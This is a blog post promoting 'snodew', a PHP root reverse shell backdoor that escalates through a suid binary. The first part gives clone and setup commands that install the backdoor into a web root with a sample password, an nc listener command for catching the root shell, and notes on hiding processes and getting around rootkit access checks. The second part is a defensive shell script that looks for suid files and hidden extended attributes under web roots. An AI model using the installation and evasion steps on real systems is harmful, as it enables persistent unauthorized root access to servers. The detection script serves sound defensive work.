In case you are not aware, several rootkits and malware sources are listed on the malware sources page of this blog. I mention this because the author of the well-known vlany rootkit has recently released a suid-based PHP root reverse shell backdoor: snodew!
What is snodew?
snodew is an open-source PHP reverse shell backdoor that uses a small suid binary to escalate privileges when a connection comes in. As a reminder, suid is short for "set user ID upon execution". It was originally meant to work alongside vlany, but it can also be set up as a standalone root backdoor. Installation requires root privileges. Because snodew assumes it is being installed together with vlany, it tries to hide its files with extended attributes, and it uses the magic gid in the suid binary to hide the /bin/sh process. Snodew can help maintain access to a target inside a network that runs a PHP-enabled web service. In a well-protected environment, however, suid will be disabled. Another problem is that without a rootkit alongside this PHP shell backdoor, everything it does is visible. The author is aware of these limitations and some others.
git clone https://github.com/mempodippy/snodew.git
cd snodew/
./setup.sh [install dir] [password] [hidden extended attribute] [magic gid]
Example usage for regular (non-vlany-infected) systems:
cd /tmp
git clone https://github.com/mempodippy/snodew.git
cd snodew/
./setup.sh /var/www/html/blog sexlovegod X 0
# 'X' and '0' since the extended attribute doesn't really matter,
# and our suid binary will set our gid to 0
After you check out the repository or copy the files to a host, you can run the script, which places the shell in a location of your choice along with the hidden attribute. Once that is done, you simply need to open a listener such as Netcat (nc -vlp 31337 😉) on the port you specified and wait for a connection!
Result of successful setup
Result after following instructions given on our new page
- requires a web service to be running on the box (along with PHP support for the service package)
- sh process spawned from service user is visible, though this could be subverted by checking /proc/self/cmdline and hiding the process if it contains the hidden suid bin
- if not being used alongside some kind of rootkit, everything you do is visible
- it's only a reverse shell
- when vlany is installed, simply su'ing to the service user won't allow them to see the files. vlany checks whether an apache environment variable is also exported before giving access to the file, and does the same for nginx, so that by default the file can only be accessed from a browser or from an owner shell
- exporting the apache environment variable that vlany checks, after su'ing to the service user will circumvent this
- suid may be disabled on the target
- not using 'exit' to leave the shell will leave the process spawned by the service visible in process lists (ps, top, etc.)
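As an added defender-side example (not part of snodew or this post), the following POSIX shell sweep looks for exactly the artefacts described above: set-uid/set-gid files under a web document root, any extended attributes on them, and whether the filesystem even honours the suid bit. It assumes /var/www as the default web root and GNU findutils, coreutils and attr (getfattr), and the web roots and file names are constructed for illustration.

```shell
#!/bin/sh
# Defender sweep for suid helpers dropped under a web root (added example).
# Assumptions: /var/www as default root; GNU find/stat, findmnt and getfattr.

# Print every set-uid or set-gid regular file under the given directories.
# A normal web document root should contain none of these at all.
find_web_suid() {
    for root in "$@"; do
        [ -d "$root" ] || continue
        find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
    done
}

# Number of hits, usable as an alerting threshold (expected: 0).
count_web_suid() {
    find_web_suid "$@" | wc -l | tr -d ' '
}

# Prints 1 if the filesystem holding $1 is mounted nosuid (the kernel then
# ignores the set-uid bit, which is the "suid disabled" case in the post),
# 0 if suid is honoured, and 2 if findmnt is not available to check.
mount_nosuid() {
    command -v findmnt >/dev/null 2>&1 || { echo 2; return 0; }
    opts=$(findmnt -n -o OPTIONS -T "$1" 2>/dev/null) || opts=""
    case ",$opts," in
        *,nosuid,*) echo 1 ;;
        *)          echo 0 ;;
    esac
}

# Human-readable report: mode, owner, size and path of each hit, followed by
# its user extended attributes, where a "hidden extended attribute" marker
# set by an installer would show up.
report_web_suid() {
    find_web_suid "$@" | while IFS= read -r f; do
        stat -c '%A %U:%G %s %n' "$f"          # GNU stat format
        if command -v getfattr >/dev/null 2>&1; then
            getfattr -d -m - "$f" 2>/dev/null | sed 's/^/    xattr: /'
        fi
    done
    echo "set-uid/set-gid files under web roots: $(count_web_suid "$@")"
    echo "nosuid mount for first root (1=yes,0=no,2=unknown): $(mount_nosuid "$1")"
}

# Usage: ./sweep.sh /var/www [/srv/www ...]
if [ $# -gt 0 ]; then report_web_suid "$@"; fi
```

Run it from cron or a configuration-management check; a non-zero count, or a hit carrying an unexplained user.* attribute, is worth an incident ticket.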